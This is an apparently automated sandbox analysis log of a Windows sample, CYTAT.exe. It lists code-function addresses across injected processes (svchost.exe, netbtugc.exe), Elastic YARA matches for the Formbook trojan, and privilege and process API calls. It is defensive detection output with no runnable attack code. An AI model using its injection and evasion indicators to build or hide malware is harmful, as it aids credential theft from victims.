            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0042200C0_2_0042200C
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0041A2170_2_0041A217
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004122160_2_00412216
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0042435D0_2_0042435D
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004033C00_2_004033C0
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0044F4300_2_0044F430
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004125E80_2_004125E8
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0044663B0_2_0044663B
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004138010_2_00413801
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0042096F0_2_0042096F
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004129D00_2_004129D0
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004119E30_2_004119E3
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0041C9AE0_2_0041C9AE
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0047EA6F0_2_0047EA6F
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0040FA100_2_0040FA10
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0044EB5F0_2_0044EB5F
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00423C810_2_00423C81
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00411E780_2_00411E78
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00442E0C0_2_00442E0C
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00420EC00_2_00420EC0
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0044CF170_2_0044CF17
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00444FD20_2_00444FD2
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_03FC27500_2_03FC2750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004181134_2_00418113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040F9C34_2_0040F9C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040F9BC4_2_0040F9BC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_00402209
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_00402210
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_004162FE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_004162BC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_00416303
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0040FBE3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0040DC63
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_00402DC0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0042E653
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035FA352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_036003E6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035C02C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035C8158
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03530100
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035F81CC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_036001AA
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03564750
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0353C7C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0355C6E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03600591
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035F2446
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035EE4F6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035FAB40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035F6BD7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0360A9A6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0354A840
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03542840
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0356E8F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035268B8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035B4F40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03560F30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03582F28
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03532FC8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0354CFE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035BEFA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03540E59
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035FEE26
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035FEEDB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03552E90
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035FCE93
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035DCD1F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0354AD00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0353ADE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03558DBF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03540C00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03530CF2
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035E0CB5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0352D34C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035F132D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0358739A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0355B2C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035E12ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035452A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0360B16B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0352F172
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0357516C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0354B1B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035EF0CC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035470C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035F70E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035FF0E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035FF7B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035F16CC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035F7571
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035DD5B0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03531460
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035FF43F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035FFB76
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035B5BF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0357DBF9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0355FB80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035FFA49
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035F7A46
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035B3A6C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035EDAC6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035DDAAC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03585AA0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03549950
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0355B950
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035D5910
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035AD800
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035438E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035FFF09
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03541F92
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035FFFB1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03549EB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035F1D5A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03543D40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035F7D73
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_0355FDC0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035B9C32
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_035FFCF2
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe Code function: 10_2_033F0BAB
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe Code function: 10_2_033F2B7E
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe Code function: 10_2_033F0BFE
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe Code function: 10_2_033F9257
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe Code function: 10_2_033F929E
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe Code function: 10_2_033F9299
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe Code function: 10_2_033F295E
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe Code function: 10_2_033F2957
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe Code function: 10_2_033FB0AE
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe Code function: 10_2_034115EE
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032DA352
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032E03E6
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_0322E3F0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032C0274
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032A02C0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03210100
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032BA118
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032A8158
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032E01AA
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032D41A2
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032D81CC
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032B2000
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03220770
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03244750
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_0321C7C0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_0323C6E0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03220535
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032E0591
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032C4420
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032D2446
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032CE4F6
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032DAB40
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032D6BD7
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_0321EA80
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03236962
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032229A0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032EA9A6
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03222840
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_0322A840
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032068B8
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_0324E8F0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03262F28
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03240F30
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032C2F30
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03294F40
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_0329EFA0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_0322CFE0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03212FC8
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032DEE26
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03220E59
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03232E90
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032DCE93
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032DEEDB
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_0322AD00
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032BCD1F
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03238DBF
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_0321ADE0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03220C00
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032C0CB5
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03210CF2
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032D132D
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_0320D34C
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_0326739A
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032252A0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032C12ED
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_0323B2C0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032EB16B
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_0325516C
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_0320F172
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_0322B1B0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032D70E9
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032DF0E0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032CF0CC
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032270C0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032DF7B0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03265630
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032D16CC
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032D7571
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032BD5B0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032DF43F
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03211460
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032DFB76
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_0323FB80
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03295BF0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_0325DBF9
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03293A6C
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032DFA49
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032D7A46
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03265AA0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032BDAAC
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032C1AA3
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032CDAC6
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032B5910
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03229950
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_0323B950
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_0328D800
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032238E0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032DFF09
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032DFFB1
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03221F92
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_031E3FD5
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_031E3FD2
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03229EB0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032D7D73
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03223D40
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032D1D5A
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_0323FDC0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_03299C32
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_032DFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_00A11A30
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_00A0C960
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_00A0C959
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_00A0CB80
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_00A0AC00
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_00A150B0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_00A132A0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_00A1329B
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_00A13259
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_00A2B5F0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_030DE338
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_030DE7EC
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_030DE453
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_030DCB03
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_030DCAAB
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 12_2_030DD858
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 035AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03587E54 appears 101 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0352B970 appears 272 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03575130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 035BF290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 03255130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 0328EA12 appears 86 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 03267E54 appears 102 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 0320B970 appears 277 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 0329F290 appears 105 times
            Source: C:\Users\user\Desktop\CYTAT.exe Code function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\CYTAT.exe Code function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\CYTAT.exe Code function: String function: 00445AE0 appears 65 times
            Source: CYTAT.exe, 00000000.00000003.1268995808.00000000046C3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs CYTAT.exe
            Source: CYTAT.exe, 00000000.00000003.1271191039.000000000486D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs CYTAT.exe
            Source: CYTAT.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3106282282.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.3106163686.0000000003240000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1475778706.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3099190951.0000000000C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1476818616.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1472630321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3094745137.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@12/9
            Source: C:\Users\user\Desktop\CYTAT.exe Code function: 0_2_0044AF6C GetLastError, FormatMessageW
            Source: C:\Users\user\Desktop\CYTAT.exe Code function: 0_2_004333BE GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, GetLastError, ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState, SetSystemPowerState
            Source: C:\Users\user\Desktop\CYTAT.exe Code function: 0_2_00464EAE OpenProcess, GetLastError, GetLastError, GetCurrentThread, OpenThreadToken, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, AdjustTokenPrivileges, GetLastError, OpenProcess, AdjustTokenPrivileges, CloseHandle, TerminateProcess, GetLastError, CloseHandle
            Source: C:\Users\user\Desktop\CYTAT.exe Code function: 0_2_0045D619 SetErrorMode, GetDiskFreeSpaceW, GetLastError, SetErrorMode
            Source: C:\Users\user\Desktop\CYTAT.exe Code function: 0_2_004755C4 CreateToolhelp32Snapshot, Process32FirstW, __wsplitpath, _wcscat, __wcsicoll, Process32NextW, CloseHandle
            Source: C:\Users\user\Desktop\CYTAT.exe Code function: 0_2_0047839D CoInitialize, CoCreateInstance, CoUninitialize
            Source: C:\Users\user\Desktop\CYTAT.exe Code function: 0_2_0043305F __swprintf, __swprintf, __wcsicoll, FindResourceW, LoadResource, LockResource, FindResourceW, LoadResource, SizeofResource, LockResource, CreateIconFromResourceEx
